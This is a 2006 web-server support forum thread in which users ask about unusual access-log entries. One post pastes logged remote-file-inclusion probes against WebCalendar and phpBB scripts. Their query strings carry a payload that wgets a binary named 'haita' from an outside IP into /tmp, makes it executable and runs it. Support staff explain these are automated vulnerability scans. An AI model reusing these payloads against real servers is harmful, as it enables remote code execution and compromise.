What is this???

winterhart · Posted: Mon Apr 03, 2006 2:06 am Post subject: What is this???

I just got the free server working again...

And I keep getting every two seconds...

192.168.0.123 - - [02/Apr/2006:20:05:48 -0500] "OPTIONS / HTTP/1.1" 403 403 "" "Microsoft-WebDAV-MiniRedir/5.1.2600"

Tom Chapman · - Joined: 09 Jul 2005 Posts: 933 Location: Australia

I would not have much of a clue but to clear things up it's either a service or program by the name of Microsoft-WebDAV-MiniRedir/5.1.2600, 5.1.2600 being XP SP1? Are using Pro or Home?

winterhart · Posted: Mon Apr 03, 2006 5:14 am Post subject: I'm using XP Home

for the moment.

Don't have the funds to get XP Pro yet... but that is in the works.

I shut down the server for now, and did some searching online with that string.

What bugs me is that's an INTERNAL to our house network IP.

MonkeyNation · - Joined: 05 Feb 2005 Posts: 921 Location: Cardiff

http://en.wikipedia.org/wiki/Webdav
_________________

aprelium · - Joined: 22 Mar 2002 Posts: 6800

http://www.aprelium.com/forum/viewtopic.php?t=6512 .
_________________
Support Team
Aprelium - http://www.aprelium.com

jibbajabba · Posted: Wed Apr 05, 2006 7:16 pm Post subject:

didnt want to start a new thread but any idea what this is trying to do.

221.3.232.142 - - [05/Apr/2006:14:35:30 +0100] "GET /webcalendar/tools/send_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:32 +0100] "GET /webcalendar/send_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:33 +0100] "GET /webcalendar/tools/send_reminders.phpsend_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:35 +0100] "GET /modules/PNphpBB2/includes/functions_admin.phpfunctions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:36 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:37 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:39 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:40 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:42 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:43 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:44 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
_________________
http://www.jibba-jabba.net | http://www.mosthauntedforum.com

Goatie.dk · Posted: Thu Apr 06, 2006 1:25 am Post subject:

jibbajabba

That's just someone trying to find vulnerability in some scripts.
I get those kinds of attacks once 3 or 4 days from different IPs.
_________________
The insane dane who loves AWS :D
http://home.goatie.dk

<- pic = online.. no pic, guess ;P

aprelium · - Joined: 22 Mar 2002 Posts: 6800

jibbajabba,

This is a typical little attack. The attack consists in trying to take advantage of several known vulnerabilities in old versions of popular scripts.
So if you have not these scripts or if yours are up-to-date, there is no risk. If you look closer to the log lines, Abyss Web Server always responded with error status 404 (or 4xx) which means that it refused to serve the request because it was either referencing an inexistent file/directory or because the server judged it was very suspicious (if it is using a lot of .. and . or malformed codes).
If such attacks tend to take too much of your bandwidth, we suggest turning o the anti-hacking feature in Abyss Web Server. With it, the server will monitor visitors and will ban those who generate too many errors in a short amount of time (which is typical of attackers).
_________________
Support Team
Aprelium - http://www.aprelium.com

jibbajabba · Posted: Fri Apr 07, 2006 11:58 am Post subject:

ok thanks for the info.
_________________
http://www.jibba-jabba.net | http://www.mosthauntedforum.com